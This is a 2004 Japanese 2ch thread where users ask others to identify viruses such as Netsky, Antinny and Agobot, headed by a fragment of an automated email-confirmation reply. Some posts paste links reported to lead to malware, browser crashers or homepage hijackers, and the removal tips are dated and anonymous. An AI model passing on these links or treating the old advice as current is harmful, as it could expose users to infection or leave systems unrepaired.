brown-confirm-accept.1078405672.31107.2cbc36@najapan.com
に空メールをお送りください。 
あるいは直接お電話いただけると幸いです。
この作業を最初にされますと、これから先あなたからの
メッセージは直接送り先へ配達されます。
(注意:サーバーが指定致しましたアドレスへのメッセージ
    は空メールでお願い致します。
    受取人はこのメールを確認することが出来ません。)
お手数とは思いますが、セキュリティーの為ご了承ください。
受取人に素早くメールを送信する為にも素早い対応を
お願い致します。
以上
--- 下記にあなたのオリジナルのメッセージを記します---
Subject: Re: Here 以下略


581 :名無しさん@お腹いっぱい。:04/03/05 01:57
【質問】
windoes2000を使っています。
ハードディスクをC〜Oに切って使っているのですが、
ドライブを共有にしたことはないのに全てのドライブが共有になっていました。
また、何度「共有にしない」にチェックを入れても「共有」に戻ってしまいます。
対策を教えてください。よろしくお願いします。

582 :名無しさん@お腹いっぱい。:04/03/05 02:24
>>581
ウイルスかもよ

583 :名無しさん@お腹いっぱい。:04/03/05 03:41
>>581
ウィルス鴨

584 :名無しさん@お腹いっぱい。:04/03/05 09:52
すみません教えてください。
Microsoft VisualStudio 6.0の中のOLE view使ってたら
Japan Sexっていう海外電話のダイアラーが立ち上がりました。
TRO_JPNSX_Aだと思ってウィルスバスターとオンラインクリーナーと
システムクーリナー使って調べたけど引っかかりませんでした。
これもやっぱりウィルスなんでしょうか。

585 :584:04/03/05 09:56
>TRO_JPNSX_Aだと思って
TROJ_JPNSX.Aだと思って の間違いです
私自身が感染してました。

586 :584:04/03/06 04:11
怪しいOCX全部消してレジストリをちまちま再編成したら直りました。
ありがとうございました。

587 :名無しさん@お腹いっぱい。:04/03/06 21:05
http://www.cac-net.ne.jp

588 :名無しさん@お腹いっぱい。:04/03/07 16:37
>579
一応聞くが、自分で調べてみたか?
あと、><はここでは使わんほうが良い

589 :名無しさん@お腹いっぱい。:04/03/08 15:09
rawsex ってウイルス存在しますか?
妹が感染サセタカモ・・・・泣きそう・・・

590 :ぼるじょあ ◆yBEncckFOU :04/03/08 15:48
>>589
(・3・) エェー ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_MOON.Q

591 :名無しさん@お腹いっぱい。:04/03/08 17:52
Program Version:6.0.615
Virus Database:394
grisoft.czにて確認。


592 :名無しさん@お腹いっぱい。:04/03/08 20:11
質問させてください.
Win2000なんですが,システムディレクトリ「C:\WINNT」の中に
「delttsul.exe」ってのがあって,これをリネームすると自分の
複製を作るんです.
ネットでしらべてもわからないんですが,このファイルについて
何か知っていたら教えてください.
何度消してもすぐに(5秒ぐらい)ですぐ復活します
ウイルスでしょうか?
ノートンアンチウイルスは常に最新版でLIVEアップデートもかけていますが
まったく反応しません。

593 :名無しさん@お腹いっぱい。:04/03/09 01:49
AVG free edition で JS/Psyme というウィルスが検知されました。
感染ファイルは、secure{1}.phpというファイルです。
場所は C:\Documents and Settings\***(ユーザー名)\Local Settings\Temporary Internet Files
\CONTENT_IE5\M3OVK1QP\secure{1}.php です。
ウィルスソフトで駆除を試みましたが駆除が出来ないと出てしまいました。
エクスプローラーから直接ファイルを確認しようとしても、\Temporary Internet Filesより下のディレクトリー
は、表示されません。
システムの復元を試してみましたが、ダメでした。

結局ディスククリーンアップで、一時ファイルなどを削除して漸く検知はされなく成りました。

これはこのまま放置でも大丈夫なのでしょうか?

594 :名無しさん@お腹いっぱい。:04/03/09 02:15
マイコンピュータとかマイドキュメントを開くと、
アイコンが表示されずに固まって画面上部に灰色の線みたいなものが現れます。
とりあえずファイルを検索しようと思っても、検索を開くと固まってしまって何も出来ません。
Ctrl+Alt+Delも効かなくなるので、電源もボタン長押しで落とすしかありません。
これって何かのウイルスが原因なのでしょうか?

595 :名無しさん@お腹いっぱい。:04/03/09 05:31
>>563
今全く同じ状態に陥ってます・・・

596 :589:04/03/09 14:55
ウィンドウズからファィル削除を試みたのですが
出来ません・・・もぅ本当困ってまつ・・・・

>>590サン
それはURLでつか??跳べないのでつが・・・

ダレカ教えてくださいーお願いします


597 :第17使徒ゲパチエル ◆CgRMNK8cWw :04/03/09 16:56
ccAppって何でつか?
ウィンドウズ終わる時に必ず出ます
「このプログラムは応答していません」って・・・・・・・・
ちなみにXPです


598 :名無しさん@お腹いっぱい。:04/03/09 21:08
>>597
ノートン

599 :第17使徒ゲパチエル ◆CgRMNK8cWw :04/03/09 23:13
どう言う事ですか?ノートンって確かに入れてますけど

600 :名無しさん@お腹いっぱい。:04/03/10 00:47
>>599
ノートンそのもの

601 :名無しさん@お腹いっぱい。:04/03/11 13:20
>593
処理方法を自力で調べられない奴らは、フリーアンチウィルス使うなwww
製品でも使いこなせないか。

602 :名無しさん@お腹いっぱい。:04/03/11 23:42
ある板のあるスレにバイラス・ページへの直リンが貼られました。
すでに被害者が出ている模様ですが、これはどんなウィルスですか?
削除依頼済みなんでお早めに…

http://music3.2ch.net/test/read.cgi/musice/1076751973/117

603 :名無しさん@お腹いっぱい。:04/03/12 00:02
>>602
そのスレにJS.Exception.Exploitって出てるじゃん

604 :名無しさん@お腹いっぱい。:04/03/12 02:40
>>>602
リンク先既に無いし。

605 :名無しさん@お腹いっぱい。:04/03/12 14:28
久し振りに、ウイルスバスター2004で手動検索したら
JAVA_BYTVERIFY.A が出てきました。どうしたらいいの?
ウイルスデータベース読んだけど、解らない・・・

606 :605:04/03/12 16:53
なんとなく解決しました。

607 :名無しさん@お腹いっぱい。:04/03/14 17:18
知り合いからファイルもらってから
時々ランダムに血の痕みたいなものがディスプレイにちらほらと出て恐怖しているのだが・・・
一体これは何のウイルスですか?
ぐぐっても過去ログ見ても乗っていなかった。

黒いデスクトップなだけに余計に気持ち悪い。

608 :名無しさん@お腹いっぱい。:04/03/14 17:28
ウイルス対策ソフトを導入していないのかと。
オンラインスキャンくらいしろと。

609 :607:04/03/14 21:21
>>608
ウィルス対策ソフト導入+オンラインスキャンして何も出なかった罠。

610 :名無しさん@お腹いっぱい。:04/03/15 08:48
>>607
ジョークの類じゃないの?
ファイルくれた友達を問い詰めるべし

611 :名無しさん@お腹いっぱい。:04/03/15 18:04
>>607
かなり昔(5年くらい前か?)デスクトップに赤いのがいっぱいできる
マーバークって流行ったけど、あんなかんじ?

612 :名無しさん@お腹いっぱい。:04/03/15 18:12
>>609
>ウィルス対策ソフト導入+オンラインスキャンして何も出なかった罠。
検知されないものなんてたくさんあるよ。
新種・亜種ウィルス・トロイ・ワーム・ジョーク・スパイウェア含めて。
個人で作ったファイルとかで報告件数がゼロとかだと特に。
対策ソフトの過信は禁物。信頼できるファイルだけ開くのが無難だよん。
(それでもかかっちゃうときはかかっちゃうけど)

613 :名無しさん@お腹いっぱい。:04/03/15 19:52
古賀さんを引っ掛けたウィルス無いのかな。
感染すると、「私の卒業証明書を知りませんか?」というエラーメッセージが
表示されるウィルスがあると面白いよな。

614 :名無しさん@お腹いっぱい。:04/03/15 20:10
すいませんが質問です。
なんか私のギコナビにウイルスが侵入したらしく
「Unix.Penquin」とか言うらしいです
どなたか対策方法おねがしします。

615 :名無しさん@お腹いっぱい。:04/03/15 21:59
http://www.symantec.com/region/jp/sarcj/data/u/unix.penguin.html

シェル スクリプト ファイル内で Unix.Penguinが検出された場合、
そのファイルにはおそらく、ユーザのシステム パスワード データ
ファイルを電子メールで送信するように指示する命令が含まれています。

ってことは駆除した後速攻でパスワード変えたほうがいいですよ。
ちなみに正しい名前はUnix Penguinです。
緊急age

616 :名無しさん@お腹いっぱい。:04/03/15 23:21
WORM ANTINNY.Bってなんですか??
ウイルスバスターのウイルス辞典に載ってないのに警告されます。
WINDOWSY\SYSTEM32\MSIDNTLDDRV.EXEが感染しているみた
いですけど、隔離できないので削除もできない・・・・(^_^;)


617 :名無しさん@お腹いっぱい。:04/03/15 23:49
ANTINNYの亜種ですかねぇ。ファイル名は詐称かもしれません。
タスクマネージャ>プロセスで確認してActiveなら
プロセス終了で隔離できません?

618 :名無しさん@お腹いっぱい。:04/03/15 23:59
私も同じANTINNY.Bに感染してました。ご指摘の通り、プロセス終了したら、隔離はできました。しかし、いったい何なのでしょう?どんな悪さをするか不安です。

619 :名無しさん@お腹いっぱい。:04/03/16 00:04
>ANTINNY.B
デスクトップに重要なファイル(アドレス帳やパスワードを記載したファイル)を移動しといた方が良いらしいよ。


620 :名無しさん@お腹いっぱい。:04/03/16 00:07
>>617
ありがとうございます。
プロセス終了したら自動的に隔離されました。
隔離リストのステータスに「このファイルには不正コードが含まれて
います。」と書いてありましたが、削除して大丈夫なのかしら??
慌てて削除して痛い目に遭うのもなんだから、しばらく隔離しておこう
かな!!

621 :名無しさん@お腹いっぱい。:04/03/16 00:10
ここにもキンタマの被害者かwww

622 :名無しさん@お腹いっぱい。:04/03/16 01:12
Happy99.Wormのウィルスに感染してノートンで消去したんですけど
このウィルスって大丈夫なんでしょうか?どんなウィルスなんですか?
PC初心者なんでわかりません。どなたか、教えていただけないでしょうか?お願いします。
私は2ちゃんねるのスレでこのウィルスに感染しました・・・・。

623 :名無しさん@お腹いっぱい。:04/03/16 01:16
>>622
http://www.google.co.jp/

624 :名無しさん@お腹いっぱい。:04/03/16 01:20
ネット環境をのっとられ、レジストリも書き換えられ、
感染したコンピュータからメールに添付されてばら撒かれる。
あなたが送った覚えはなくても勝手に実行されていたりする。
これはウィルスじゃなくて、ワームなので余計たちが悪い。
ワーム界で有名なやつですよ。
駆除したんでしょ?一応複数のオンラインウィルススキャン使って
ちゃんと消えてるか確かめたほうがよさげ。

625 :607:04/03/16 01:31
色々とアドバイスありがとうございました。
あれから色々調べ、知り合いを頼ってみたのですがいっこうに改善の様子は無し・・・

ジョークソフトかと思ったのですが、上から血がしたたり落ちるという感じではなく
ttp://www21.tok2.com/home/diruru/image3/chow000.gif
の状態(蝶を除く)で時間・デスクトップで表示される場所がランダムで出てきます。

>>610
何でもかんでも送りつけてくる友人(多数)なだけに特定が出来ない状態に・・・
出処とか聞けば良かったと今後悔でいっぱいです。

>>611
マーバークなるものをぐぐってみましたが情報が載っていないため、それなのかどうか
把握ができず申し訳ない。

>>612
ad-wareでスパイウェアは削除してみましたが、それでも発生するとなると
もうリカバリーしか手段がないと思ってしまいました(´・ω・`)

626 :名無しさん@お腹いっぱい。:04/03/16 02:11
>>623さん
>>624さん。
ありがとうございました。
ノートンでスキャンして完全削除しました。
このワームって、すごく有名だったんですね。知りませんでした。
これから、アーボンって書いてあるものには触れないようにします。

627 :名無しさん@お腹いっぱい。:04/03/16 04:09
>>616
>>618

http://myui.s53.xrea.com/kin/index.html

今までで最も凶悪なウイルスです・・・。ご愁傷様ですw

628 :名無しさん@お腹いっぱい。:04/03/16 04:29

【TBS】砂の器のVTR編集NY愛用か?【キンタマウィルス】
http://ex4.2ch.net/test/read.cgi/siberia/1079372150/

TBS関係者がウイルスにひっかかって大騒ぎになってるぞ
  悲惨

629 :名無しさん@お腹いっぱい。:04/03/16 04:31
ttp://www.andr.net/
ここって危ないですか?スレに貼られてしまったんですが


630 :名無しさん@お腹いっぱい。:04/03/16 06:47
ttp://ime.st/ime.nu/www2.strangeworld.org/uedakana/sahra0002.jpg
ノートン反応したんですが

631 :名無しさん@お腹いっぱい。:04/03/16 07:58
>>630
インターネット一時ファイルの削除でOK。
やり方分からないなら>>623のURLで調べろ。

632 :名無しさん@お腹いっぱい。:04/03/16 08:20
最近、某サイトに数時間接続していると
PCにWORM_JUBON.Aがよく侵入しておる。

633 :名無しさん@お腹いっぱい。:04/03/16 12:49
>>632
SMTPポート25にアクセスがあるだけじゃないの?


って、そんなポートにアクセスしてくるのはおかしいが。

634 :名無しさん@お腹いっぱい。:04/03/16 20:56
メールマガジン発行してるところからW32/Netsky.d@MMの添付つきファイル送ってしまった
、ってお詫びのメールが来ました
これってたいしたことない?  

635 :名無しさん@お腹いっぱい。:04/03/16 21:32
>>631
レスどもです。
検疫→削除でokですね。

636 :名無しさん@お腹いっぱい。:04/03/16 21:38
>>634 

ふくびきコム?

637 :名無しさん@お腹いっぱい。:04/03/17 03:23
なんか、ある日突然に右下に勝手にeマークのアイコンが・・・・
気持ち悪いんで消したいんだけど。
ttp://akamai.downloadv3.com/

638 :名無しさん@お腹いっぱい。:04/03/17 05:06
>>625 >>607
血しぶき Winnyのこれかな とりあえず各スレのログたどってみ
http://ex4.2ch.net/test/read.cgi/news/1079456655/81n

639 :名無しさん@お腹いっぱい。:04/03/17 20:22
馬鹿が初心者板にペタペタ貼っているようでつが、何でつか?

ttp://fire.prohosting.com/ff455/dss.lzh


640 :名無しさん@お腹いっぱい。 :04/03/17 20:36
>>638
情報ありがとうございます。
「血しぶき」に「ny」と「スレ」と単語プラスしてぐぐってみたら出てきました。

後で聞いてみた所1人の友人が俺にnyさせようと、ふつうのフォルダの中に
自分のnyをコピーしたものを入れたと。
そいつは血しぶきが出ていなかったみたいで、当時「血しぶき?何それ?」と
相談した時の返答。こいつのせいで俺は眠れない夜を過ごしていたかと思うと・・・

お陰様でリカバリーせずにすみました。
駆除みたいなことをしてみましたので今は様子見です(バスター対応していないみたいですので)。

641 :名無しさん@お腹いっぱい。:04/03/17 22:58
ここんとこ毎日W32.Netsky.D@mmのウイルスが来て(゚д゚)ウザー

642 :名無しさん@お腹いっぱい。:04/03/18 00:28
俺もNetskyがウザイ

643 :名無しさん@お腹いっぱい。:04/03/18 21:45
exeクリックしたとたん
windowsフォルダ内のファイル(下位フォルダ以外)ほとんどすべて
消されるウイルスってなんですか?


644 :名無しさん@お腹いっぱい。:04/03/18 21:56
多すぎてわかりまへん。

645 :名無しさん@お腹いっぱい。:04/03/18 23:40
ドラクエの音楽とともにDOS書き換えられてPC立ち上がらなくなるのって何でしたっけ?

646 :名無しさん@お腹いっぱい。:04/03/19 20:52
>>561
>ノートンはいってるんですが、ウイルスチェックする度に
ブートレコード警告が出てブートレコードに変更があったといわれます。
スキャンしたけどウイルスは見つかりませんでした

漏れもです。
ググってみたけどだめ。
大事な時は家族のPCを借りる事にして、
気長に対処していくしかないかな。

647 :名無しさん@お腹いっぱい。:04/03/20 02:52
>646
amilala 踏んでそう(ブートレコード警告)なったということ?
そうでなければ、スマンテックのページを。参考までに。

Situation
「マスターブートレコード(重要な起動情報が入っている項目)が変わりました。」 の警告に関して。
ttp://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/c7d1acae01be591988256b5f0071e3f2

648 :名無しさん@お腹いっぱい。:04/03/20 09:55
Netskyの添付ファイル開いてないけど文字化けが直りませんですた大変ですた

649 :646:04/03/21 19:35
>>647
ありがとうございます。参考になります。

リンクを踏む時は先に検索して慎重にしていたので、
編みららは踏んでないと思います。
教えていただいたページを見て、もしかしてwindows updateで
「ie6の重要な更新」がなかなかインストールできない
(ノートンを切ってもだめでした)ことが関係あるかもしれないと思いました。
とりあえず頑張ってみます。

650 :初心者:04/03/22 13:32
http://default-homepage-network.com/start.cgi?hkcu
無防備にリンクを踏んでしまいました。
これはウイルスでしょうか?教えてください。


651 : ◆VIRUSzXyeo :04/03/22 13:41
>>650
違う。ゾンビウィンドウと逃げウィンドウとか。
元のページにはやたらにクリックするなとかサイト閲覧時の注意が書いてあった。

652 :初心者:04/03/22 13:51
>>651
ありがとうございました。
ウイルスに感染しました・・・みたいな表示?が出たような気がして
ヒィー(((゚Д゚)))ガタガタ でした。初心者は大人しくしていようと思います。

653 :名無しさん@お腹いっぱい。:04/03/22 20:19
パソコン初心者です。
なんかパソコンにW32.Netsky.D@mm
っていうのがファイルに入ってるメールが来ます。
まだ開けてないです。
送り主はDDIのPHSです。
ムカつくんですが、どうすることもできないんでしょうか?? 

654 :名無しさん@お腹いっぱい。:04/03/22 20:25
>>653
削除しろ。送り主のメアドに心当たりが無かったらどーしよーも無い。

655 :653:04/03/22 20:37
→654
  あ、即答ありがとうです。
  わかりました。削除します(泣)
  もしオフラインで、んなファイルよこしたら
  なるたけタダで帰さないようにするんだけど、ムネン。。。
  更にですが、その送り主のアドレスを
  2ちゃんに書き込んだら、犯罪でしょうか? 

656 :名無しさん@お腹いっぱい。:04/03/22 20:39
>>655
メアド晒しは削除対象だね。
悪意を持って晒して相手に訴えられたら (((( ;゚Д゚)))ガクガクブルブルかも。

657 :655:04/03/22 20:44
→656
  わかりました。
  自分を刺したもんを刺したら、おまわりさん来るのと一緒ですね。
  ご親切に、ありがとうでした。

658 :名無しさん@お腹いっぱい。:04/03/23 02:27
大量の戻りメールが送られてくる。

うちのメアド情報持ってる奴が何かのウイルスに侵されて
うちのメアドでウイルスメール出しまくってるんだと思うんだが、、、

今のところ苦情メールは来てないんだけど
商売でやってるから、大人数に送られてたら信用がた落ちだよヽ( `Д´)ノ ウワァァァン

何か上手い対処方法ないかな?

659 :名無しさん@お腹いっぱい。:04/03/23 02:34
Your file is attached.

添付 mp3 music plf
pif file

何だろう?


660 :名無しさん@お腹いっぱい。:04/03/23 08:46
>>659
少しはぐぐれよ。

661 :名無しさん@お腹いっぱい。:04/03/25 05:39
>>651
「ゾンビウィンドウ」「逃げウィンドウ」って何よ。
そんな真性厨房サイトが勝手に作ったような用語、世間で通用しないよw
マジレスだがJavaScript関係の用語使うなら素直にそのまま使えよ。
別にギシギシに正確にとは言わない。たとえばonunloadとかmovetoとかだけでもいいさ。
定義も定かでないそんな言葉並べてなんとなく分かったように進めてしまうと
問題が見えなくなるぞ。

662 :名無しさん@お腹いっぱい。:04/03/25 16:10
>>661
問題とは?

663 :名無しさん@お腹いっぱい。:04/03/26 00:44
>>661
ググればJavaScriptの解説よりも
(初心者にとっては)分かりやすい対応法が出るからじゃねーの?
鑑定スレの固定だから、(初心者にとっては)専門的なネタを避けようって配慮だろうよ。

まぁ、2chと世間は違うんだし、サポセンとWebデザイナーも違う業務内容なんだし。

664 :名無しさん@お腹いっぱい。:04/03/26 04:02
>>663
俺は661と同意見。
たとえば明かに2ch的な雑談などならば、2chなど一部の場所でしか
通用しにくいことばを使って会話を楽しむのもいいだろう。
だがウィルスなどセキュリティ関連の内容となると話は別だ。
難しい用語を分かりやすくという配慮も時と場合を選ぶ。
そうした内容では、初心者に対してだからこそ一層気を遣って、
一般に広く使われていることば・本来の用語を素直にそのまま使用するほうが適切だ。
ことばを二重に定義するということは、本来の意味から無駄に遠ざかるわけで、
その分内容を曖昧・複雑にしてしまいかねない。
ググるにしても、本来の言葉であれば検索結果数や情報量が各段に異なるから、
そこから内容の理解への路がいっそう拓けるというものだ。

665 :名無しさん@お腹いっぱい。:04/03/26 15:17
>>664に、言ってることが半分しか伝わっていないようなんで追記。

意見としては、「必要な情報が、多過ぎたりしても混乱するだけだろ」ってこと。
JavaScriptの勉強だなんて、いわゆる"ホームページ"とやらを作るわけでもなければ荷が重いんだし、
覚える前にもう一回引っかかってしまうよりは、例えその場しのぎでも、対応法が見つかった方が心強い。
それに、作り方の部分から講釈してしまうと、馬鹿な奴がコピペし、第二第三とブラクラが増えてしまう。

良い面悪い面は多々あれど、トータルで考えればその対応で問題ないと思うよ。

666 :名無しさん@お腹いっぱい。:04/03/26 18:49
必要な情報量が多過ぎては混乱するというのはもっともだろう。
すでに存在していることばを別の言葉で再定義することは、情報量を増加させてしまう。
また、その場しのぎの対処法は、融通の利かない知識の蓄積に繋がる。

一例だが、たとえばALT+F4を、あたかもウィンドウが立て続けに開くタイプの
ブラクラを止めるスイッチであるかのように、
図式的に覚えこんでしまっているひとにしばしば出会う。
実際少し前にそのネタでスレまで立ったほどだ。
ALT+F4でそのタイプのブラクラが止まると聞いていたのに止められない、
これはいったいどうしたものだというのだ。
そこでは結局、ALTやF4あるいはブラクラ発動時に押されやすいその他のキー
が押されとき、ウィンドウを閉じたとき、マウスを動かしたとき……
これらに反応してブラクラを再発動させる方法が使われていたのだ。
一見似たようなブラクラでもその実、多種多様であって、
臨機応変に対処する必要があるという好例だろう。

軽いブラクラに遭遇して、覚えているその場しのぎの対応法を試みて
仮に止まなかったとしても、結果的にさほど危険はないかもしれない。
だがそれがシステムやデータを破壊しかねない悪質なエクスプロイト・
ベンダによっては新種のウィルスとして定義するであろう内容のもの
であったらどうだろうか。
作り方の講釈・お勉強云々ということではない。仕組みを理解していれば、
大切なシステム・データを護る対処法にも自ずから応用が利くというものだ。

667 :名無しさん@お腹いっぱい。:04/03/26 19:33
java初歩的なことしかわかんないけど、たしかに最初ゾンビウィンドウ(゚Д゚)ハァ?って感じだったわな。
イメージはわくけど、検索してやっとナルホロ〜(´Д` )

668 :第17使徒ゲパチエル ◆CgRMNK8cWw :04/03/26 19:44
http://www2.strangeworld.org/
これは何ですか?

669 :名無しさん@お腹いっぱい。:04/03/26 20:17
>>668
http://ex2.2ch.net/test/read.cgi/entrance/1080205631/l50
ラウンジ鑑定依頼スレ

670 :名無しさん@お腹いっぱい。:04/03/26 20:36
Windows98SEなのですが、パソコンを起動する途中(黒い画面のまま)で
電源が落ちてしまうようになりました。セーフモードや起動ディスクからでも同じ症状です。
OSやIEなどは最新パッチ、NortonAntiVirus2004は常に最新定義にして常駐させていました。

これは何でしょうか・・・

671 :名無しさん@お腹いっぱい。:04/03/26 20:45
>>670

またアミララ被害者か?

672 :名無しさん@お腹いっぱい。:04/03/26 22:07
Win2000で、Nortonの定義ファイルは最新です。
今日、やばそうな.exe(空白たくさん.exeでアイコンがフォルダ)を
実行してしまったのですが、Nortonは何も言わなかったし、見た目パソコンに変化ないです。
そのファイルを右クリックしてウイルススキャンしても、ハードディスクを丸ごと
ウイルススキャンしてもウイルスはありませんと言われます。
なんだったのかが気になるんですけど、なんか心当たりある方います?

673 :名無しさん@お腹いっぱい。:04/03/26 23:12
>>672
随分と心配性だな

1.やばそうな.exe(空白たくさん.exeでアイコンがフォルダ)を実行してしまった
2.Nortonは何も言わなかった
3.見た目パソコンに変化ない
4.そのファイルを右クリックしてウイルススキャンしても、ハードディスクを丸ごと
ウイルススキャンしてもウイルスはありませんと言われた


ここまでやれば何も心配ないだろうよ


674 :名無しさん@お腹いっぱい。:04/03/26 23:28
パソを立ち上げてIEを開くとトップページが毎回身に覚えの無いページで
始まってしまいます、これもウイルスの一種なのでしょうか?
素人でスイマセン、アドバイスいただければ幸いです・・・

675 :名無しさん@お腹いっぱい。:04/03/27 00:05
>>674
エロサイト見たら…助けてください!Part19
http://pc2.2ch.net/test/read.cgi/pcqa/1079883028/l50


676 :名無しさん@お腹いっぱい。:04/03/27 00:26
たぶんBlasterかNachiか、それらの派生物だとは思うのですが、
svchostがやたらCPUパワー食いまくって、regeditを起動してもすぐに終了させてしまい、
WindowsUpdateのインストーラーも勝手に終了させてしまうウィルスに感染してしまいました。
SymantecのFixBlasterとFixWelchiaという無料の駆除ツールで検索しても見つかりませんでした。
OSはWindows2000です。

上記のようなウィルス心当たりありませんでしょうか。
名前がわかれば、なんらかの対処ができると思うのですが。
よろしくお願いします。

677 :名無しさん@お腹いっぱい。:04/03/27 00:47
>>676
オンラインスキャンよりも強力なウイルス検出能力を持つ
http://sukiero.ktplan.net/antidote.html

678 :名無しさん@お腹いっぱい。:04/03/27 00:48
>>653
同じ症状です。DDI、KDDI、hotmailから来ます。
でも自分でこれらのプロバイダ使ってるので、
私が感染源か?と思ってしまった。身に覚えなし。
今のところ被害はないんですけど…、
ケータイにも来るのがイヤだ。

679 :名無しさん@お腹いっぱい。:04/03/27 00:49
ディスクトップに「~」というファイル名のアイコンが度々出来ますが
これはいったい何でしょうか?

680 :名無しさん@お腹いっぱい。:04/03/27 01:07
>>677
ありがとうございます。NAVもやられちゃうんでかなり助かりました。
では、これからナローでパソコン初心者で車で2時間の家に住む親のサポートに出向きまつ(つд`;)

681 :名無しさん@お腹いっぱい。:04/03/27 01:21
>>679
スパイウェアぽいね。
http://higaitaisaku.web.infoseek.co.jp/spyware.html

682 :679:04/03/27 01:30
>>681
有り難うございます。
頻繁に現れるのでその都度削除しているのですが、
どうもそのファイル更新時間など見ていくとメール送信後に
作成されるみたいです。秀丸などのエディタで中を見てみると
所々十進でメールアドレスの様な文字が確認出来ます。その他は
文字化けしてますが・・・一度調べてみます。

683 :名無しさん@お腹いっぱい。:04/03/27 02:22
>>682
メールのバックアップファイルではないのか?

684 :679:04/03/27 10:32
>>683
バックアップした記憶はないのです。それにファイル名は
拡張子なしのただ「~」という名前がついてます。

685 :名無しさん@お腹いっぱい。:04/03/27 12:44
>>684
HijackThis診断して貰いなよ。
http://higaitaisaku.web.infoseek.co.jp/hijackthis.html

686 :名無しさん@お腹いっぱい。:04/03/27 15:33
>>684
ttp://homepage2.nifty.com/winfaq/c/oetrouble.html#1475
これをまず確認してみれ。

687 :679:04/03/27 16:20
>683&>685&>686様
お騒がせしました。686様が教えてくれたサイトを読んで解決しました。
どうもすみませんでした。それに思いっきり板違いでしたね。
ごめんなさい。

688 :あぼーん:あぼーん
あぼーん

689 :名無しさん@お腹いっぱい。:04/03/29 23:09
ANTINNY.Bってやばいんですか?

690 :名無しさん@お腹いっぱい。:04/03/29 23:58
>>688
誰もオメーんところにはアホらしくて送らねーよ
糞して寝てろ

691 :名無しさん@お腹いっぱい。:04/03/30 00:46
>>689
参考に!
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B

692 :名無しさん@お腹いっぱい。:04/03/30 10:31
ピロピロピロとリズムで電子音がひたすら鳴るようになってしまったのですけど何かのウィルスでつかね…

693 :名無しさん@お腹いっぱい。:04/03/30 10:41
>>692
それだけの情報で分かったら神だろ。
とりあえず、スキャンして来い。

http://www.trendmicro.co.jp/hcall/index.asp

694 : :04/03/30 11:32
>>692

ttp://www.itmedia.co.jp/news/articles/0403/30/news022.html

NetSky.Qはこれまでの亜種と違い、午前5時11分に警告音を鳴らすほか、
DoS攻撃を起こすよう仕組まれている。

---
これの可能性が高いかな?
でも、「午前5時11分に」というあたりがちょっとわからないけど

695 :名無しさん@お腹いっぱい。:04/03/30 13:14
>Netsky.Qに感染すると、Windowsディレクトリに「SysMonXP.exe」として自分自身を
>コピーするほか、「FIREWALLLOGGER.TXT」や「ZIPO0.TXT」も自身のコピーとして
>同時に作成する。そして、レジストリを自分自身がWindows起動時に自動実行する
>ように改変する。

こういうのを読むと、自分のPCを感染させて見たい衝動にかられるのは俺だけですか?



696 :名無しさん@お腹いっぱい。:04/03/30 14:16
>>695
ボリュームコントロールをミュートにしても>>692の音がピロピロうるさいのでやめたほうがいい

697 :名無しさん@お腹いっぱい。:04/03/30 20:06
Blasterのチェックで検出されないのにマシンが再起動しまくります。

ログイン画面になったとたん5秒後くらいには落ちてしまいます・・

こういう症状のウィルスってBlaster以外にもありますでしょうか?

698 :名無しさん@お腹いっぱい。:04/03/30 22:19
パソの電源を入れると画面が真っ暗で、スピーカーから
「シフト打てPCユーザー」とエンドレスで流れます;

とりあえず、言うとおりシフトうって再起動したら起動しましたが、
「Overclock failed」の画面がでました。
その後、何回か再起動しましたが、画面の設定が突然変わったり
しました。そのほかは問題ありません。

ウイルスか何なのかさっぱりわからないのでなにかわかる人
いたら教えてください。お願いします。
マザーボードの警告メッセージではないです。

699 :名無しさん@お腹いっぱい。:04/03/30 23:16
パソコンを窓から(ry

700 :名無しさん@お腹いっぱい。:04/03/31 00:12
(・∀・)スッドレ!

701 :名無しさん@お腹いっぱい。:04/03/31 01:54
マカーなのでスキャンできないので助けてください
ウイルスファイルっぽいの開いちゃったんです。
そしたらNstscapeの新しいのが、開けるんだけどネットにつながらなくなりました。
旧netscape(os9以下クラシック環境の)と、同じくクラシック環境の
IEは使えます。
なんですか

702 :名無しさん@お腹いっぱい。:04/03/31 03:04
>701
自分は自宅ではMac使い(いまだに8.6)だけど、
それだけじゃわけわからん。もちつけ。

703 :名無しさん@お腹いっぱい。:04/03/31 09:53
>>701
とりあえず、適当にいろいろ試してみろ。
1.Netscape再インストール
2.Mac用のアンチウイルスソフトを買ってくる
3.「俺みたいなのがMacを使おうだなんて、3年早かった」と言い残し、アメリカへ旅立つ
4.怒ってピョンピョンとジャンプしてみる

704 :名無しさん@お腹いっぱい。:04/03/31 13:58
Macでも'W32/Netsky-Q' に感染するんですか?

俺os9だが、大量のウィルスメールが送られてくるよ・・。

705 :名無しさん@お腹いっぱい。:04/04/01 20:19
上でもあがってるんですけど、ウイルス関連、UpDate関連のサイトが繋がりません。
ノートンで検索かけても発見されないのですが、これはウイルスですよね?
これはどうすればいいんでしょ?

706 :名無しさん@お腹いっぱい。:04/04/01 20:34
ごめん、あげるね

707 :名無しさん@お腹いっぱい。:04/04/01 21:00
>>704
感染するわけないだろ。

708 :名無しさん@お腹いっぱい。:04/04/04 01:33
画面とかが更新されるたび画面が赤くなって最後にぬるぽって出るんだが、どういうウイルスなんですか?
対処方法ってどうやったらいいんですかね?

709 :名無しさん@お腹いっぱい。:04/04/04 01:57
ttp://www.geocities.jp/kim_virus/pickup.html

710 :名無しさん@お腹いっぱい。:04/04/04 02:02
>>709
俺、winnyやってないんだが・・・なんで感染したんですかね?

711 :名無しさん@お腹いっぱい。:04/04/04 03:29
ここ数日「puresoul-driver」「spree8」という名称のメールが来ます。
検索をかけても該当しないのですが。
同じものが送られてきた人っていますか?

712 :名無しさん@お腹いっぱい。:04/04/04 10:33
>697
>705

Agobotの亜種の可能性が高い。Blaster同様、RPCの脆弱性を突くワームなので、
見た目はBlasterと同じ。でも、Blasterじゃないので、定義ファイル更新してないと
ひっかからない。もう対策してる会社が多いんだが・・・。
Regidetいじって直せるんだが、何に詐称してるかわからないからなぁ・・・。
HKEY_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\Runと
HKEY_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\
RunServices
に変なのがつけられてるから値削除して指定先のEXE削除。
削除すればたぶん対策会社のHPに繋がるはず。

713 :第17使徒ゲパチエル ◆CgRMNK8cWw :04/04/05 08:49
